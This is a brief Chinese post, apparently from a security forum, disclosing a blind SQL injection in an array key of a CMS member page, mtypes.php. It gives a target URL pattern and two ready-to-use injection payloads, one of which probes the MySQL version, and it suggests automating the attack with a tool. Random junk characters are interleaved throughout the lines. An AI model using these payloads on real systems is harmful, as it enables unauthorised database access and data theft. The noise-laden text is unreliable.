需要magic_quotes_gpc = Off,所以说是鸡肋啊.0 t7 D, i7 u) p/ A( g9 }
7 j2 ]$ t9 `) C- a! u8 | 1 i: B2 a/ z1 l; \
发生在数组key里的注射漏洞,有点意思.
5 S" `6 V9 t( k
& f/ H% t/ S3 U) B, I7 W+ E这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下/ k, A8 v+ f5 \+ t+ t1 z6 J
7 R, `% H% @6 k+ B! p- p, `http://www.xxx.com /dede/member/mtypes.php?dopost=save
& R. ?% n) e/ i4 w+ V8 E' N; ~
% ~: Q5 r* w/ _% y& Iexploit:
/ {3 O/ X' |( O" d! s r: r1 mmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r2 u( t% `8 v4 p$ z, t
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r% e9 `2 x$ y' {8 r
|